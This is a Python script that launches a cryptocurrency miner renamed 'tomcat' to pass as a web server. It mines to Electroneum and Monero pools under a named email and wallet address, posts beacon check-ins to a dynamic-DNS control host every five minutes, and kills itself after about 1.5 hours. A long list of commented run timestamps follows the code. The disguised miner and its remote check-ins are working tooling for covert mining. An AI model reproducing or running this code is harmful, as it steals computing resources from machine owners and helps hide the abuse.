import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:04.111635
#2018-02-17 16:18:03.217784
#2018-02-17 18:05:02.915834
#2018-02-17 19:54:03.676539
#2018-02-17 21:43:05.419471
#2018-02-17 23:27:07.336181
#2018-02-18 01:17:06.995129
#2018-02-18 03:04:03.826747
#2018-02-18 04:51:07.886654
#2018-02-18 06:43:02.080167
#2018-02-18 08:33:07.385720
#2018-02-18 10:20:08.188363
#2018-02-18 12:06:07.060554
#2018-02-18 13:51:07.283157
#2018-02-18 15:43:04.873572
#2018-02-18 17:33:03.530306
#2018-02-18 19:19:04.724410
#2018-02-18 21:05:05.902213
#2018-02-18 22:51:06.840849
#2018-02-19 00:39:07.320648
#2018-02-19 02:24:07.998313
#2018-02-19 04:11:08.056026
#2018-02-19 05:56:05.105725
#2018-02-19 07:45:07.057079
#2018-02-19 09:34:06.114987
#2018-02-19 11:24:01.382460
#2018-02-19 13:11:03.933368
#2018-02-19 14:59:08.366453
#2018-02-19 16:48:11.383074
#2018-02-19 18:34:09.003852
#2018-02-19 20:20:07.034833
#2018-02-19 22:08:07.499888
#2018-02-19 23:54:07.644749
#2018-02-20 01:40:08.632562
#2018-02-20 03:28:05.272614
#2018-02-20 05:15:06.062696
#2018-02-20 06:57:05.276420
#2018-02-20 08:44:09.041569
#2018-02-20 10:28:07.259419
#2018-02-20 12:13:07.958846
#2018-02-20 14:01:04.606759
#2018-02-20 15:44:08.478100
#2018-02-20 17:29:09.861576
#2018-02-20 19:18:07.035505
#2018-02-20 21:06:05.604576
#2018-02-20 22:50:07.550787
#2018-02-21 00:34:06.755186
#2018-02-21 02:21:06.418048
#2018-02-21 04:07:07.227955
#2018-02-21 05:54:07.554864
#2018-02-21 07:43:02.005927
#2018-02-21 09:28:05.649710
#2018-02-21 11:17:02.085489
#2018-02-21 13:04:06.001072
#2018-02-21 14:51:05.774125
#2018-02-21 16:41:11.966668
#2018-02-21 18:32:08.066021
#2018-02-21 20:17:04.473896
#2018-02-21 22:05:09.815042
#2018-02-21 23:52:05.960181
#2018-02-22 01:42:03.989567
#2018-02-22 03:30:01.672945
#2018-02-22 05:16:06.591268
#2018-02-22 07:02:04.976036
#2018-02-22 08:50:06.574389
#2018-02-22 10:38:01.283471
#2018-02-22 12:24:09.453286
#2018-02-22 14:09:03.990112
#2018-02-22 15:55:09.335417
#2018-02-22 17:42:05.135497
#2018-02-22 19:28:04.645121
#2018-02-22 21:20:09.774519
#2018-02-22 23:05:06.770930
#2018-02-23 00:51:03.594472
#2018-02-23 02:38:07.172079
#2018-02-23 04:26:02.748829
#2018-02-23 06:11:07.703529
#2018-02-23 07:56:06.451123
#2018-02-23 10:14:04.620121
#2018-02-23 12:08:10.227967
#2018-02-23 13:57:04.340302
#2018-02-23 15:48:05.972634
#2018-02-23 17:35:01.275919
#2018-02-23 19:23:01.453505
#2018-02-23 21:06:07.995451
#2018-02-23 22:51:04.037695
#2018-02-24 00:39:05.666155
#2018-02-24 02:29:04.014390
#2018-02-24 04:20:06.125549
#2018-02-24 06:08:06.370578
#2018-02-24 07:57:01.985057
#2018-02-24 09:41:03.556556
#2018-02-24 11:37:04.328647
#2018-02-24 13:27:05.031998
#2018-02-24 15:16:01.836796
#2018-02-24 17:05:04.504516
#2018-02-24 18:55:07.520448
#2018-02-24 20:42:04.319333
#2018-02-24 22:52:01.931666
#2018-02-25 02:12:04.470647
#2018-02-25 04:49:06.200076
#2018-02-25 08:28:01.861513